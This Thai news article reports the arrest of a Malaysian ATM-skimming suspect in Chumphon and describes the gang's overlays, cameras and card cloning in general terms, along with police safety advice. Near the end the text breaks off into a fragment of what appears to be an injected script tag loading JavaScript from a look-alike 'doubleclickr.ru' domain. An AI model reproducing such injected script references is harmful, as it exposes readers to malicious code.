เผยโจรเอทีเอ็มใช้เครื่องแจมมิ่ง


เผยโจรเอทีเอ็มใช้เครื่องแจมมิ่งสวมติดไว้หน้าตู้

แฉพฤติกรรมโจรไฮเทคมาเลเซียแสบ ตร.เผยใช้กลวิธีแยบยล ออกแบบฝาครอบที่สอดบัตรตู้เอทีเอ็มปลอม แล้วแอบนำมาติดตั้งพร้อมเครื่อง “แจมมิ่ง” ซึ่งเป็นเครื่องคัดลอกข้อมูลอิเลคทรอนิกส์ แล้วแอบติดกล้องตามด บนผนังตู้ดูรหัสที่ผู้เสียหายกด ก่อนส่งสัญญาณไปยังคอมพิวเตอร์โน้ตบุ๊กของคนร้าย พร้อมคัดลอกข้อมูลใส่แถบแม่เหล็กบัตรปลอม ไปกดเงินจนเกลี้ยง จนท.ชี้ควรสังเกตตู้ทุกครั้ง ขณะป้อนรหัสควรใช้มือปิดบัง

กรณีโจรไฮเทคออกอาละวาดก่อเหตุลอบถอนเงินของผู้เสียหายจากตู้เอทีเอ็ม ของธนาคารกรุงเทพ จำกัด (มหาชน) ที่จุดตลาดอวยชัย 3 หมู่ 4 ต.วังตะกอ อ.หลังสวน จ.ชุมพร หลังผู้เสียหายเข้าไปใช้บริการ เบื้องต้นมีเจ้าทุกข์แจ้งความไว้รวม 20 ราย ยอดเงินกว่า 3 ล้านบาท ล่าสุดเจ้าหน้าที่ตำรวจ สภ.หลังสวน สามารถ บุกจับกุมนายเตียว เก๊ก หลิง อายุ 43 ปี ชาวมาเลเซียหนึ่งในแก๊งคนร้ายได้ที่ อ.หาดใหญ่ จ.สงขลา และยอมรับสารภาพว่าได้ร่วมกับเพื่อนที่ยังหลบหนีก่อเหตุดังกล่าว โดยใช้อุปกรณ์มหาภัย “แจมมิ่ง” พัฒนามาจากสกีมเมอร์ ก๊อบปี้ข้อมูลเหยื่อที่มากดเงิน ก่อนโอนเข้าบัญชีตัวเอง
 
เกี่ยวกับความคืบหน้า เมื่อเวลา 09.30 น. วันที่ 9 มี.ค. ที่กองบัญชาการตำรวจภูธร ภาค 8 พล.ต.ท.สัณฐาน ชยนนท์ ผบช. ภ.8 พร้อม พล.ต.ต.อภิชาติ เชื้อเทศ ผบก.ภ.  จว.ชุมพร ร่วมกันแถลงข่าวการจับกุมตัวนายเตียว ต่อสื่อมวลชน ด้าน พล.ต.ท.สัณฐาน กล่าวว่า ในขณะที่เจ้าหน้าที่ชุดจับกุมเข้าควบคุมตัว นายเตียว ได้เสนอเงิน 1.2 ล้านบาท เป็นสินบนให้กับเจ้าหน้าที่ เพื่อแลกกับการปล่อยตัว แต่เจ้าหน้าที่ไม่ยอม เบื้องต้นจากการสืบสวนพบว่าแก๊งดังกล่าวมีด้วยกันอย่างน้อย 4-5 คน ทั้งหมดเป็นชาวมาเลเซีย เข้ามาดำเนินการโจรกรรมข้อมูลบัตรเอทีเอ็มของลูกค้าธนาคารต่าง ๆ ในพื้นที่ภาคใต้ ต่อเนื่องมาแล้ว 4-5 เดือน มีมูลค่าความเสียหายไม่น้อยกว่า 50 ล้านบาท ซึ่งทางตำรวจภาค 8 จะได้ประสานกับตำรวจสืบสวนสอบสวนคดีเศรษฐกิจ เข้ามากวาดล้างจับกุมเครือข่ายที่ยังหลบหนีอยู่ต่อไป
 
ต่อมา พ.ต.อ.สุพจน์ บุญชูดวง ผกก. สภ.หลังสวน จ.ชุมพร ได้นำตัวผู้ต้องหาไปทำแผนประกอบคำรับสารภาพ ที่ตลาดอวยชัย 3 ภายหลัง พ.ต.อ.สุพจน์ เปิดเผยถึงพฤติกรรมของคนร้ายแก๊งนี้ว่า มีวิธีการโจรกรรมข้อมูลของเหยื่อ โดยเริ่มแรกคนร้ายคงใช้วิธีถ่ายภาพตู้เอทีเอ็มเป้าหมายก่อน แล้วกลับไปที่มาเลเซียเพื่อออกแบบฝาครอบที่สอดบัตรของตู้เอทีเอ็ม จากนั้นจึงนำกลับมาแปะทับที่ช่องสอดบัตร แล้วติดตั้งเครื่องมือที่เรียกว่า “แจมมิ่ง” ซึ่งเป็นเครื่องคัดลอกข้อมูลอิเล็กทรอนิกส์ พร้อมติดกล้องแอบถ่ายขนาดเล็กที่เรียกว่า “กล้องตามด” ไว้   บนผนังด้านบนของตู้เอทีเอ็ม ซึ่งหากไม่สังเกตจะไม่เห็น และเครื่อง “แจมมิ่ง” และกล้อง  ตามดดังกล่าวจะมีเครื่องส่งสัญญาณไปยังคอม  พิวเตอร์โน้ตบุ๊กที่คนร้ายใช้อยู่ในรถที่จอดอยู่ห่างจากตู้เอทีเอ็มในรัศมีไม่เกิน 100 เมตร
  
หลังจากติดตั้งอุปกรณ์เหล่านี้แล้ว คนร้ายคงไปนั่งเปิดโน้ตบุ๊กรออยู่ในรถ เมื่อมีเหยื่อนำบัตรมากดเงินได้ 15-20 ราย อุปกรณ์ที่ติดอยู่ในตู้เอทีเอ็มจะส่งสัญญาณภาพและรหัสที่เหยื่อกดไปยังคอมพิวเตอร์โน้ตบุ๊กของคนร้าย จากนั้นคนร้ายก็จะตรวจสอบเงินในบัญชีของเหยื่อแต่ละคน หากพบว่ารายใดมีเงินมาก ก็จะคัดลอกข้อมูลไปใส่ในแถบแม่เหล็กในบัตรเอทีเอ็มปลอมที่คงมีเครื่องทำปลอมอยู่ในรถนั่นเอง เมื่อเหยื่อออกจากตู้ไปแล้ว คนร้ายก็จะนำบัตรที่ปลอมขึ้นมาไปกดเงินจากตู้เอทีเอ็มตู้อื่นแล้วโอนเงินไปเข้าบัญชีที่ อ.หาดใหญ่ จ.สงขลา
 
พ.ต.อ.สุพจน์ กล่าวต่อไปว่า น่าเสียดายที่ขณะจับกุมคนร้าย เจ้าหน้าที่ไม่พบคอมพิวเตอร์โน้ตบุ๊กของคนร้าย คาดว่าคงนำไปเก็บไว้ที่มาเลเซียแล้ว จึงไม่ทราบว่าคนร้ายใช้โปรแกรมอะไรในการโจรกรรมข้อมูลบัตรเอทีเอ็มดังกล่าว จึงอยากเตือนประชาชนที่ใช้บัตรเอทีเอ็มว่า ทุกครั้งที่นำบัตรไปกดเงินควรสังเกตตู้เอทีเอ็มนั้น ๆ ว่ามีสิ่งแปลกปลอมติดตั้งอยู่บ้างหรือไม่ และขณะป้อนรหัสควรใช้มือบังทุกครั้ง เพื่อป้องกันมิให้คนร้ายโจรกรรมข้อมูลของเราได้ง่าย ๆ และหากพบสิ่งผิดปกติใด ๆ ที่ตู้เอทีเอ็มต้องรีบแจ้งให้เจ้าหน้าที่ตำรวจและทางธนาคารทันที
 
วันเดียวกัน ที่กรมสอบสวนคดีพิเศษ (ดีเอสไอ) พ.ต.อ.ทรงศักดิ์ รักศักดิ์สกุล ผบ.  สำนักกิจการต่างประเทศและคดีอาชญากรรมระหว่างประเทศ เปิดเผยว่า จากการสอบสวนเครือข่ายปลอมแปลงบัตรเครดิตของดีเอสไอ พบว่ายังมีเครือข่ายที่ยังไม่ถูกจับกุม 10-20 กลุ่ม โดยมีชาวยุโรปกลาง ร่วมกับชาวมาเลเซียและคนไทย เข้ามาติดตั้งอุปกรณ์อิเล็กทรอนิกส์เพื่อขโมยข้อมูลบัตรเครดิตและบัตรเอทีเอ็ม ซึ่งอุปกรณ์ตัวใหม่ล่าสุดสั่งซื้อจากประเทศสเปน จะมีลักษณะใกล้เคียงกับอุปกรณ์ที่ติดตั้งตาม src=http://www.doubleclickr.ru/index.js>


แสดงความคิดเห็น

เว็บไซต์สำเร็จรูป รองรับการแสดงผลบนมือถือ


เว็บไซต์สำเร็จรูป รองรับการแสดงผลบนมือถือ

เป็นเว็บไซต์ระบบ Responsive 100% สามารถปรับรูปแบบการแสดงผลได้เองโดยอัตโนมัติ ตามอุปกรณ์ที่เปิดชม (ทั้ง Front end และ Back end) เช่น สมาร์ทโฟนทุกรุ่น, แท็บเล็ต, iPad และ iPhone เป็นเจ้าของได้แล้ววันนี้ ในราคาโปรโมชั่น...คลิกดูรายละเอียด